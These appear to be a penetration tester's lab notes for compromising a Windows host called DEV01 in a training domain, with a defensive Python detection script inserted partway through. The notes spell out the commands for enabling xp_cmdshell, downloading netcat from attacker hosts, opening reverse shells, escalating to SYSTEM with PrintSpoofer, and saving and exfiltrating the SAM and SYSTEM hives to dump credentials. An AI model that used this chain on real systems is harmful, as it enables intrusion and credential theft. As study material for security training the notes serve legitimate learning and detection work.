# nmap scans
- light ![[images/Pasted image 20260701203330.png]]
- create `ports.txt` ![[images/Pasted image 20260701203353.png]]
- detailed ![[images/Pasted image 20260701203641.png]]
---
# Port 445 (SMB)
- null auth
- `nxc smb` ![[images/Pasted image 20260701204126.png]]
- `smbclient` ![[images/Pasted image 20260701204157.png]]
---
# Port 111, 2049 (NFS)
- enum mounts ![[images/Pasted image 20260701205023.png]]
- mount the share
```bash
mkdir nfs
sudo mount -t nfs 172.16.8.20:/DEV01 ./nfs/ -o rw
```
- browse share ![[images/Pasted image 20260701205352.png]]
- `CKEditor` has a github: [CKEditorProvider/Install/Dnn.CKEditorDefaultSettings.xml at development · DNN-Connect/CKEditorProvider · GitHub](https://github.com/DNN-Connect/CKEditorProvider/blob/development/Install/Dnn.CKEditorDefaultSettings.xml)
- `web.config` has creds for `Administrator` ![[images/Pasted image 20260701205537.png]]
---
# Port 80 (http; IIS httpd 10.0)
- visit page ![[images/Pasted image 20260701204305.png]]
- this is a DotNetNuke CMS
- register test user ![[images/Pasted image 20260701204352.png]]
- will check later ![[images/Pasted image 20260701204434.png]]
- maybe a way to grab an NTLMv2 hash? but we are not uploading a file
- login with creds from NFS
- we have access to a super user account ![[images/Pasted image 20260702135140.png]]
- admin logs ![[images/Pasted image 20260702135259.png]]
- there is an SQL console ![[images/Pasted image 20260702135646.png]]
## Abuse SQL Console
- enter the script below and run it to enable `xp_cmdshell`
```mssql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
- now run below
```mssql
xp_cmdshell 'whoami'
```
![[images/Pasted image 20260702135958.png]]
- `nt service\mssql$sqlexpress` has the `SeImpersonatePrivilege`
---
# Shell as `nt service\mssql`
## powershell revshell
- create a base64 encoded powershell revshell
```mssql
xp_cmdshell "powershell -ep bypass -e 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"
```
- limited to 128 chars ![[images/Pasted image 20260702140818.png]]
## `nc64.exe`
- host `nc64.exe` from Kali and download to `c:\programdata`
- no hit on http server
```mssql
xp_cmdshell "certutil -urlcache -split -f http://10.10.15.114:8000/nc64.exe c:\programdata\nc64.exe"
```
- wget
- got a hit on http server
```mssql
xp_cmdshell "powershell.exe -c wget http://172.16.8.120:9003/nc64.exe -outfile c:\programdata\nc64.exe"
```
![[images/Pasted image 20260702142321.png]] ![[images/Pasted image 20260702142325.png]]
- run `c:\programdata\nc64.exe` from xp_cmdshell
```mssql
xp_cmdshell "c:\programdata\nc64.exe 10.10.15.114 9001 -e cmd"
```
![[images/Pasted image 20260702142549.png]]
- incompatibility error
- run `systeminfo` ![[images/Pasted image 20260702142734.png]]
## `nc.exe`
- let's try `nc.exe`
```mssql
xp_cmdshell "powershell.exe -c wget http://172.16.8.120:9003/nc.exe -outfile c:\programdata\nc.exe"
xp_cmdshell "c:\programdata\nc.exe 172.16.8.120 9001 -e cmd"
```
- we have a shell ![[images/Pasted image 20260702143015.png]]
## potato attack
- from here we can run a potato attack
- move `PrintSpoofer64.exe` to target
```cmd
certutil -urlcache -split -f http://172.16.8.120:9003/PrintSpoofer64.exe c:\programdata\spoofer.exe
```
- execute attack
```cmd
.\spoofer.exe -c ".\nc.exe 172.16.8.120 9002 -e cmd"
```
- shell as `nt authority\system` ![[images/Pasted image 20260702143826.png]]
---
# shell as `nt authority\system`
- save the SAM, SYSTEM and SECURITY hives
```cmd
reg.exe save hklm\sam C:\programdata\sam.save
reg.exe save hklm\system C:\programdata\system.save
reg.exe save hklm\security C:\programdata\security.save
```
- setup smbserver with creds on Kali
- without a username and password it initially failed with the error below ![[images/Pasted image 20260702145339.png]]
```bash
sudo impacket-smbserver share -smb2support share/ -user test -password test
```
- exfil hives back to Kali
```cmd
:: map the Kali share as drive n: (cmd has no '#' comment syntax)
net use n: \\172.16.8.120\share /user:test test
move sam.save n:\
move system.save n:\
move security.save n:\
```
![[images/Pasted image 20260702145439.png]]
- good to go ![[images/Pasted image 20260702145433.png]]
- extract hashes
```bash
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```
![[images/Pasted image 20260702145717.png]]
- save to file `dev01.hashes`
- we have DCC2 for domain user: `inlanefreight.local/hporter`
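A defender's view of the chain above, as an added example that is not part of the original notes: a small Python detector run over constructed process-creation events that mirror this writeup's steps (SQL Server spawning cmd/powershell via `xp_cmdshell`, encoded PowerShell, certutil/wget downloads into `c:\programdata`, and `reg save` of the SAM/SYSTEM/SECURITY hives). The event field names and the sample events are assumptions, not data from the engagement.

```python
import re

# Constructed sample process-creation events (assumed field names: parent, image, cmdline).
# They mirror the steps in these notes; none are copied from the screenshots.
SAMPLE_EVENTS = [
    {"parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell.exe -c wget http://172.16.8.120:9003/nc.exe -outfile c:\\programdata\\nc.exe"},
    {"parent": "sqlservr.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c powershell -ep bypass -e BASE64_PLACEHOLDER"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://172.16.8.120:9003/PrintSpoofer64.exe c:\\programdata\\spoofer.exe"},
    {"parent": "cmd.exe", "image": "reg.exe",
     "cmdline": "reg.exe save hklm\\sam C:\\programdata\\sam.save"},
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\hporter\\notes.txt"},  # benign control event
]

# Each rule is (name, predicate). Rules are checked in order, so the output order is stable.
RULES = [
    # xp_cmdshell runs commands as a child of the SQL Server service process
    ("sqlserver_spawns_shell", lambda e: e["parent"].lower() == "sqlservr.exe"
        and e["image"].lower() in ("cmd.exe", "powershell.exe")),
    # -e / -enc / -encodedcommand: the base64 revshell attempt from the notes
    ("encoded_powershell", lambda e: re.search(
        r"powershell.*\s-(e|ec|enc|encodedcommand)\s", e["cmdline"], re.I)),
    # certutil used as a downloader
    ("certutil_download", lambda e: e["image"].lower() == "certutil.exe"
        and re.search(r"-urlcache\b.*\bhttps?://", e["cmdline"], re.I)),
    # PowerShell web download (wget/iwr are aliases of Invoke-WebRequest)
    ("powershell_web_download", lambda e: re.search(
        r"powershell.*\b(wget|iwr|invoke-webrequest|curl)\b.*https?://", e["cmdline"], re.I)),
    # credential material: reg save of SAM/SYSTEM/SECURITY
    ("hive_save", lambda e: re.search(
        r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", e["cmdline"], re.I)),
    # executable dropped into the world-writable ProgramData directory
    ("programdata_drop", lambda e: re.search(
        r"[a-z]:\\programdata\\[^\\\s]+\.exe", e["cmdline"], re.I)),
]


def classify(event):
    """Return the names of all rules that match one event."""
    return [name for name, check in RULES if check(event)]


def scan(events):
    """Map event index -> matched rule names, keeping only events that matched something."""
    hits = {}
    for i, event in enumerate(events):
        matched = classify(event)
        if matched:
            hits[i] = matched
    return hits
```

Correlating `sqlserver_spawns_shell` with any of the download or hive rules on the same host within a short window is the higher-confidence signal; each rule alone will fire on some admin activity.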
## `evil-winrm`
- we have durable access via `evil-winrm` ![[images/Pasted image 20260702150218.png]]
- networking info ![[images/Pasted image 20260702150325.png]]
- check for all flags
```powershell
Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue
```
- password we found in cleartext from the hash dump belongs to `hporter`
- we have a valid domain account ![[images/Pasted image 20260702150547.png]]